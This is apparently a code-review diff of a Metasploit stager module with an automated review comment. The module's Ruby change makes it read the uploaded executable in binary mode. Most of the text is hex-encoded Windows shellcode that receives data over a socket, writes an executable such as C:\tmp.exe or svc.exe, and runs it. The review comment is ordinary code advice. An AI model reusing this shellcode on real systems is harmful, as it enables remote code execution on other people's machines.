"\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b" +
|
||||
"\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0" +
|
||||
"\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b" +
|
||||
"\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" +
|
||||
"\x89\x6c\x24\x1c\x61\xc3\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" +
|
||||
"\x70\x1c\xad\x8b\x40\x08\x50\x89\xe6\x68\x8e\x4e\x0e\xec\xff\x36" +
|
||||
"\xff\x56\x04\x66\x68\x00\x00\x66\x68\x33\x32\x68\x77\x73\x32\x5f" +
|
||||
"\x89\xe5\x55\xff\xd0\x89\x46\x08\x68\xb6\x19\x18\xe7\xff\x76\x08" +
|
||||
"\xff\x56\x04\x89\x46\x0c\x6a\x00\x6a\x04\x55\x53\xff\x56\x0c\x8b" +
|
||||
"\x7d\x00\xe8\x0b\x00\x00\x00\x43\x3a\x5c\x74\x6d\x70\x2e\x65\x78" +
|
||||
"\x65\x00\x58\x89\x46\x10\x68\xa5\x17\x00\x7c\xff\x36\xff\x56\x04" +
|
||||
"\x6a\x00\x6a\x06\x6a\x04\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\xff" +
|
||||
"\x76\x10\xff\xd0\x89\x46\x14\x81\xec\x04\x08\x00\x00\x89\xe5\x68" +
|
||||
"\x1f\x79\x0a\xe8\xff\x36\xff\x56\x04\x89\x46\x18\x6a\x00\x68\x00" +
|
||||
"\x08\x00\x00\x55\x53\xff\x56\x0c\x29\xc7\x50\x89\xe1\x6a\x00\x51" +
|
||||
"\x50\x55\xff\x76\x14\xff\x56\x18\x58\x85\xff\x75\xdf\x68\xfb\x97" +
|
||||
"\xfd\x0f\xff\x36\xff\x56\x04\xff\x76\x14\xff\xd0\x6a\x50\x59\x29" +
|
||||
"\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42" +
|
||||
"\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x36\xff" +
|
||||
"\x56\x04\x57\x52\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x10\x51\xff" +
|
||||
"\xd0\x68\xad\xd9\x05\xce\xff\x36\xff\x56\x04\x6a\xff\xff\x37\xff" +
|
||||
"\xd0\x68\x25\xb0\xff\xc2\xff\x36\xff\x56\x04\xff\x76\x10\xff\xd0" +
|
||||
"\x68\xe7\x79\xc6\x79\xff\x76\x08\xff\x56\x04\xff\x77\xfc\xff\xd0" +
|
||||
"\x68\x7e\xd8\xe2\x73\xff\x36\xff\x56\x04\xff\xd0"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x7F\x58\xC1\xE0\x03\x29\xC4\x54\x50\x68\x30\xF3\x49\xE4\xFF" +
|
||||
"\xD5\x8D\x04\x04\xC7\x00\x73\x76\x63\x2E\xC7\x40\x04\x65\x78\x65" +
|
||||
"\x00\x89\xE0\x50\x6A\x00\x6A\x06\x6A\x02\x6A\x00\x6A\x07\x68\x00" +
|
||||
"\x00\x00\xE0\x50\x68\xDA\xF6\xDA\x4F\xFF\xD5\x89\xC3\x54\x89\xE6" +
|
||||
"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
|
||||
"\x04\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
|
||||
"\x53\x53\x89\xE1\x6A\x00\x51\x56\x50\x53\x89\xC3\x6A\x00\x56\x53" +
|
||||
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" +
|
||||
"\x68\x2D\x57\xAE\x5B\xFF\xD5\x59\x68\xC6\x96\x87\x52\xFF\xD5\x57" +
|
||||
"\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01" +
|
||||
"\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E" +
|
||||
"\x56\x56\xFF\x74\x24\x78\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0" +
|
||||
"\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\x57\x68\x75\x6E" +
|
||||
"\x4D\x61\xFF\xD5\xFF\x74\x24\x58\x68\xD7\x2E\xDD\x13\xFF\xD5\xBB" +
|
||||
"\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80" +
|
||||
"\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
|
||||
|
@ -73,7 +72,12 @@ module Metasploit3
|
|||
#
|
||||
def handle_connection_stage(conn)
|
||||
begin
|
||||
data = ::IO.read(datastore['PEXEC'])
|
||||
# bug fix for: data = ::IO.read(datastore['PEXEC'])
|
||||
# the above does not return the entire contents
|
||||
data = ""
|
||||
File.open( datastore['PEXEC'], "rb" ) { |f|
|
||||
data += f.read
|
||||
}
|
||||
rescue
|
||||
print_error("Failed to read executable: #{$!}")
|
||||
|
||||
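Review bot: The comment added above `data = ""` in handle_connection_stage records the symptom but not the cause, and the cause is what a maintainer needs to keep the fix: `::IO.read` opens the file in text mode, which on Windows most likely stops at an end-of-file marker byte and can rewrite line endings, so binary mode is the actual fix; suggest `# Read in binary mode: IO.read uses text mode and can truncate/mangle an executable on Windows.` in place of the two comment lines. The accumulator is unnecessary, since the block's value is the data: `data = File.open(datastore['PEXEC'], "rb") { |f| f.read }`. The same file's Author line `['vlad902', 'Stephen Fewer ...' ]` is spaced differently from `[ 'spoonm', ... ]` in the command shell module in this commit. handle_connection_stage continues outside the hunk, so the rescue path's completion is not visible here.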
|
|